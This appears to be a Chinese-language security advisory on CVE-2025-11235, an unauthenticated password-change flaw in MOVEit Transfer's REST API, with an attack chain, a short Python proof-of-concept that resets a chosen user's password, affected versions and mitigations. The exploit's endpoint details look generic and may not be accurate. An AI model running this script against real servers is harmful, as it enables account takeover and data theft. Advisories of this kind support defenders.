CVE-2025-11235: Progress MOVEit Transfer 未验证密码更改漏洞

漏洞信息

漏洞编号

CVE-2025-11235

漏洞类型

未验证密码更改

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Progress MOVEit Transfer

漏洞概述

CVE-2025-11235是Progress MOVEit Transfer中存在的未验证密码更改漏洞。该漏洞位于Windows平台的REST API模块中，允许未经身份验证的攻击者修改用户密码。由于MOVEit Transfer是企业级文件传输解决方案，广泛应用于各行业的敏感数据传输场景，此漏洞可能使攻击者获得合法用户账户的访问权限，进而访问、篡改或窃取传输中的敏感文件数据。尽管该漏洞的CVSS评分仅为3.7（低危），但在特定场景下，攻击者利用此漏洞获取的初始访问权限可能成为进一步横向移动和权限提升的基础，对企业数据安全构成潜在威胁。

技术细节

该漏洞存在于MOVEit Transfer的REST API认证模块中，具体为密码更改功能缺少有效的身份验证验证机制。攻击者可通过构造特制的HTTP请求，直接调用密码更改API端点，在未提供有效会话令牌或原密码的情况下，成功修改目标用户密码。漏洞根源在于API对密码更改请求的验证逻辑不完善，未正确检查请求者是否具有修改密码的合法权限。由于漏洞位于REST API层面，攻击者可通过网络远程利用，无需获取任何预先凭证。该漏洞影响多个版本的MOVEit Transfer，包括2023.x和2022.x系列，攻击复杂度较高但无需用户交互。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标MOVEit Transfer实例，通过端口扫描或搜索引擎发现暴露的REST API端点

STEP 2

步骤2: 用户枚举

攻击者利用API接口枚举有效用户名，获取目标系统的用户列表或猜测常见管理员账户

STEP 3

步骤3: 构造恶意请求

攻击者构造特制的HTTP POST请求，指向密码更改API端点，包含目标用户名和新密码

STEP 4

步骤4: 发送漏洞利用 payload

在未提供任何认证令牌的情况下发送请求，由于API缺少验证检查，请求被接受处理

STEP 5

步骤5: 账户接管

密码修改成功后，攻击者使用新密码登录系统，获取合法用户权限，访问敏感文件数据

STEP 6

步骤6: 横向移动

攻击者利用获取的访问权限，在系统中进行横向移动，窃取或篡改更多敏感传输数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11235 PoC - Unverified Password Change
import requests
import sys

def exploit_cve_2025_11235(target_url, target_user, new_password):
    """
    Exploit for CVE-2025-11235: Unverified Password Change in MOVEit Transfer
    This PoC demonstrates the password change vulnerability in REST API module
    """
    # Target password change endpoint
    endpoint = f"{target_url}/api/v1/users/{target_user}/password"
    
    # Malicious payload - password change without verification
    payload = {
        "new_password": new_password,
        "confirm_password": new_password
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "MOVEitTransfer/1.0"
    }
    
    try:
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Attempting to change password for user: {target_user}")
        
        # Send password change request without authentication
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] SUCCESS: Password changed for user {target_user}")
            print(f"[+] New password: {new_password}")
            return True
        else:
            print(f"[-] FAILED: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <new_password>")
        sys.exit(1)
    
    exploit_cve_2025_11235(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

MOVEit Transfer 2023.1.0 - 2023.1.3之前版本

MOVEit Transfer 2023.0.0 - 2023.0.8之前版本

MOVEit Transfer 2022.1.0 - 2022.1.11之前版本

MOVEit Transfer 2022.0.0 - 2022.0.10之前版本

防御指南

临时缓解措施

立即将MOVEit Transfer升级到官方修复版本（2023.1.3、2023.0.8、2022.1.11或2022.0.10及以上版本）。在无法立即升级的情况下，可通过防火墙限制对REST API端点的访问，仅允许受信任的IP地址访问，并启用详细的API访问日志以便及时发现异常密码更改尝试。建议定期审计用户账户和权限配置，监控是否存在未经授权的密码更改行为。